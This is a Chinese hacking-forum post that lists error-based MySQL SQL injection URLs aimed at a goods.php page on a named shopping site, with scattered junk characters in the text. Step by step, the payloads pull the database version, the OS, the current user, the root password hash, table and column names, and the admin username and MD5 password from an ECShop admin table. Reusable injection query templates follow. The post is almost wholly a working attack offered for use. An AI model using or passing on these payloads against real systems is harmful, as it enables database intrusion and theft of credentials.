找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1966|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
) A6 T4 Z5 X' w0 N+ T1 p2 Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 y& r0 E9 u- P1 ]% ^
9 _6 J: G9 P& F' O/ }5 R/ y判断系统
% r$ e# C2 l# I2 w9 x1 K# o9 N" A# g# g4 ~) W& i/ Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: Z( {7 w% H8 m5 S
  H, V8 U% K) T: F

) }! T- f, n8 `% Z! x' N  h$ ^- ~4 m/ L% G
当前 user()
: U- H6 C6 l* c# F; p9 p: R
7 \/ Q$ s- n. ?( N2 K( G- Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 q' W' W, f4 B1 t: t. H9 ^0 }0 e9 ]8 X% o" X

3 ?7 `' ~+ ?* P
1 F9 I$ U, r. y3 V% }当前 database()* j9 @5 t/ K. [( F$ s5 e& n
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ~; S0 r2 [$ S

7 e8 P+ r# q# P0 C4 n' h) G
/ @, G0 z7 k0 q* m" }
* r) M# Z: C" X: ]+ F
0 `& D- U; F" b9 Groot hash
' C0 J5 R: M1 v- o1 m) W: t, h4 j( y* ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% b0 s, T, m9 g- z* U
8 a3 ^3 p" J9 p5 f  G5 e

1 [8 Z( Q; P! Z2 x, z8 B, t
/ U1 _; h' ~/ m) }, |当前 数据库表名: H2 W& C& T, I
1 T- D: n/ E: S, V% |. X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ E/ o5 k" `! s$ }" m7 b  B

! ^; T. Y! ~( e+ Z* f" C& p
; K: E1 o( Q% m
: n; x) F; a- e- J当前 数据库 user_name 字段4 Q. }2 T: L8 J2 J' U/ g6 s8 `: S8 Q
% U2 ?6 C7 \: e, M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ p: o* o4 H  c! V7 q
% E7 U$ e& ^9 U- g1 u+ S当前 数据库 字段 password8 Y/ @+ @$ Y: e& G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  i# u6 }# \0 a3 |- d* F" H2 b2 G* y9 i" O7 A) Z) I
3 `& m" u  U. `" @" c$ \7 s
+ S/ X: \( |( f5 W
获得 admin passwd(md5)7 Y- N; F+ j6 w/ \5 K& G
7 P( [/ r4 R' {* ]" e

$ `- J; b2 w( \+ z2 S4 {5 rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( x; C% D, j& q3 r, n% V0 v
# A! Y4 l. q% ]报错注射
6 B/ n& l% G& P) O# G) i2 `SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 P6 U2 N; R  G$ x" f$ L
2 @  r) f3 E& R' _3 X! ZSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)! j% m( R; j; {0 x! `) j& s2 ~

; ]" o& \* ~# S( ^  cand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表